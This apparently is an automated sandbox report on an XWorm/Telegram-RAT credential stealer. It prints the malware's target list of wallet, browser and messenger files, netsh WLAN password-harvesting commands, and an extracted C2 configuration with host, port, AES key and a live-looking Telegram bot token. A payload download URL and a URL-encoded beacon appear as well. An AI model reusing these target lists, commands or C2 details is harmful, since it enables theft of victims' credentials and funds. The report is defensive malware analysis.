Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\Binance
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: powershell.exe, 00000006.00000002.2116961691.0000000007BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\ledger live

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: Yara match	File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B0CB0 BIO_bind,bind,ERR_put_error,WSAGetLastError,ERR_put_error,ERR_put_error,	25_2_6C1B0CB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B0DA0 BIO_listen,getsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,BIO_socket_nbio,setsockopt,BIO_ADDR_family,BIO_bind,ERR_put_error,listen,WSAGetLastError,ERR_put_error,ERR_put_error,setsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,setsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,WSAGetLastError,ERR_put_error,ERR_put_error,__stack_chk_fail,	25_2_6C1B0DA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B0F53 listen,WSAGetLastError,ERR_put_error,ERR_put_error,	25_2_6C1B0F53

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.161.193.99	securefirewall.portmap.io	Russian Federation	198134	BITREE-ASRU	true
72.132.134.217	unknown	United States	20001	TWC-20001-PACWESTUS	false
140.78.100.15	unknown	Austria	1205	JKU-LINZ-ASUniversityLinzAT	false
140.82.121.3	github.com	United States	36459	GITHUBUS	false
199.188.200.89	libyaalahrar.co	United States	22612	NAMECHEAP-NETUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
95.217.36.40	unknown	Germany	24940	HETZNER-ASDE	false
193.142.146.239	unknown	Netherlands	208046	HOSTSLICK-GERMANYNL	false
51.158.147.144	unknown	France	12876	OnlineSASFR	false
185.199.108.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
148.251.191.252	unknown	Germany	24940	HETZNER-ASDE	false
185.119.118.59	unknown	Austria	44133	IPAX-ASAT	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
libyaalahrar.co	199.188.200.89	true
github.com	140.82.121.3	true
securefirewall.portmap.io	193.161.193.99	true
ip-api.com	208.95.112.1	true
api.telegram.org	149.154.167.220	true
objects.githubusercontent.com	185.199.108.133	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line?fields=query,country	false	Avira URL Cloud: safe	unknown
https://libyaalahrar.co/uploaded/JxTcJM84e3NbGP4mm.exe	false	Avira URL Cloud: safe	unknown
securefirewall.portmap.io	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

AV Detection

Found malware configuration

Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["securefirewall.portmap.io"], "Port": "31510", "Aes key": "<19670122>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: ffmaba.exe.5624.19.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Source: yt7dW9nyJK.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yt7dW9nyJK.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack	String decryptor: securefirewall.portmap.io
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack	String decryptor: 31510
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack	String decryptor: <19670122>
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack	String decryptor: XWorm V5.2
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack	String decryptor: USB.exe

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09AA50 CRYPTO_free,free,	25_2_6C09AA50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09AAC0 CRYPTO_free,free,	25_2_6C09AAC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09A5D0 CRYPTO_malloc,malloc,	25_2_6C09A5D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D2C04 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0D2C04
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C094C29 CRYPTO_zalloc,ERR_put_error,CRYPTO_zalloc,CRYPTO_free,BUF_MEM_grow,	25_2_6C094C29
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096C23 CRYPTO_free,	25_2_6C096C23
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BCC36 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,	25_2_6C0BCC36
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B4C41 ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,	25_2_6C0B4C41
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E4C70 CRYPTO_free,CRYPTO_malloc,ERR_put_error,	25_2_6C0E4C70
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A8C80 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_flags,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_enc_null,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,__stack_chk_fail,	25_2_6C0A8C80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B4C98 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,	25_2_6C0B4C98
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D4CA8 EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D4CA8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B6CB0 CRYPTO_malloc,CRYPTO_clear_free,	25_2_6C0B6CB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AECE9 ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,	25_2_6C0AECE9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09ACE7 COMP_expand_block,CRYPTO_malloc,	25_2_6C09ACE7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A0D2B CRYPTO_strdup,	25_2_6C0A0D2B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B4D23 X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,	25_2_6C0B4D23
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A4D30 CRYPTO_get_ex_new_index,	25_2_6C0A4D30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DAD4B CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,	25_2_6C0DAD4B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AAD47 CRYPTO_free,CRYPTO_strdup,	25_2_6C0AAD47
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BAD60 BIO_s_file,BIO_new,BIO_ctrl,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,strlen,strncmp,CRYPTO_realloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,	25_2_6C0BAD60
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D2D89 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0D2D89
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A4D80 i2d_X509_NAME,i2d_X509_NAME,CRYPTO_free,CRYPTO_free,memcmp,__stack_chk_fail,X509_NAME_hash,	25_2_6C0A4D80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096DB8 CRYPTO_free,BIO_clear_flags,BIO_set_flags,memcpy,BIO_snprintf,ERR_add_error_data,__stack_chk_fail,	25_2_6C096DB8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DEDBB EVP_PKEY_new,EVP_PKEY_copy_parameters,EVP_PKEY_get0_DH,BN_bin2bn,DH_set0_key,EVP_PKEY_free,CRYPTO_clear_free,	25_2_6C0DEDBB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DADC7 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,	25_2_6C0DADC7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D0E10 EVP_PKEY_free,EVP_MD_CTX_free,BN_bin2bn,BN_bin2bn,BN_bin2bn,BN_bin2bn,CRYPTO_free,CRYPTO_strndup,__stack_chk_fail,	25_2_6C0D0E10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C094E20 CRYPTO_zalloc,ERR_put_error,	25_2_6C094E20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A4E24 CRYPTO_free,CRYPTO_free,memcmp,	25_2_6C0A4E24
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BCE30 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,	25_2_6C0BCE30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B6E60 strlen,CRYPTO_malloc,strcpy,CRYPTO_clear_free,	25_2_6C0B6E60
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AEE66 CRYPTO_realloc,CRYPTO_realloc,memset,	25_2_6C0AEE66
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A0E80 CRYPTO_zalloc,	25_2_6C0A0E80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D4EA7 CRYPTO_free,EVP_MD_CTX_free,BUF_reverse,	25_2_6C0D4EA7
